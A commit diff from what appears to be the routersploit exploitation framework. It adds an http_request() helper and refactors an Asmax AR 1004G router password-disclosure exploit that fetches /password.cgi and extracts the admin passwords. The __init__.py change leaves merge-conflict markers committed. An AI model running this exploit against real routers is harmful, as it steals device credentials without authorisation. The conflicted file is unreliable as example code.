Adding http_request() idea.

3dffcc49 · fwkz · d4fb4d39 · 3dffcc49 · 3dffcc49 · 3dffcc49
Commit 3dffcc49 authored Apr 16, 2016 by fwkz
Showing with 38 additions and 14 deletions

__init__.py routersploit/__init__.py +11 -0

ar_1004g_password_disclosure.py ...it/modules/exploits/asmax/ar_1004g_password_disclosure.py +5 -9

utils.py routersploit/utils.py +22 -5

No files found.
--- a/routersploit/__init__.py
+++ b/routersploit/__init__.py
 from routersploit.utils import (
+<<<<<<< d4fb4d39165c40b179c139a9d568e5ba87553cc8
    print_error, print_status, print_success,
    print_table, print_info, sanitize_url,
    LockedIterator, random_text,
+=======
+    print_error,
+    print_status,
+    print_success,
+    print_table,
+    print_info,
+    sanitize_url,
+    LockedIterator,
+    http_request,
+>>>>>>> Adding http_request() idea.
 )

 from routersploit import exploits

--- a/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
+++ b/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
-import requests
 import re

 from routersploit import (
@@ -8,6 +7,7 @@ from routersploit import (
    print_error,
    print_success,
    print_table,
+    http_request,
 )


@@ -40,12 +40,8 @@ class Exploit(exploits.Exploit):

        print_status("Requesting for {}".format(url))
        try:
-            response = requests.get(url).text
-        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
-            print_error("Invalid URL format: {}".format(url))
-            return
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: {}".format(url))
+            response = http_request(method="GET", url=url).text
+        except AttributeError:
            return

        admin = re.findall("pwdAdmin = '(.+?)'", response)
@@ -70,8 +66,8 @@ class Exploit(exploits.Exploit):
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))

        try:
-            response = requests.get(url).text
-        except:
+            response = http_request(method="GET", url=url).text
+        except AttributeError:
            return None  # could not be verified

        if any(map(lambda x: x in response, ["pwdSupport", "pwdUser", "pwdAdmin"])):

--- a/routersploit/utils.py
+++ b/routersploit/utils.py
@@ -5,6 +5,9 @@ import sys
 import random
 import string

+import requests
+
+
 print_lock = threading.Lock()

 colors = {
@@ -195,13 +198,11 @@ def sanitize_url(address):

    Converts address to valid HTTP url.
    """
-    if not address.startswith("http://") and not address.startswith("https://"):
-        url = "http://" + address
+    if address.startswith("http://") or address.startswith("https://"):
+        return address
    else:
-        url = address
+        return "http://{}".format(address)

-    return url
- 

 def pprint_dict_in_order(dictionary, order=None):
    """ Pretty dict print.
@@ -252,3 +253,19 @@ def random_text(length, alph=string.letters+string.digits):
    Generates random text with specified length and alphabet.
    """
    return ''.join(random.choice(alph) for _ in range(length))
+
+
+def http_request(method, url, **kwargs):
+    """ Wrapper for 'requests' silencing exceptions a little bit. """
+
+    try:
+        return getattr(requests, method.lower())(url, **kwargs)
+    except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
+        print_error("Invalid URL format: {}".format(url))
+        return
+    except requests.exceptions.ConnectionError:
+        print_error("Connection error: {}".format(url))
+        return
+    except requests.RequestException as error:
+        print_error(error)
+        return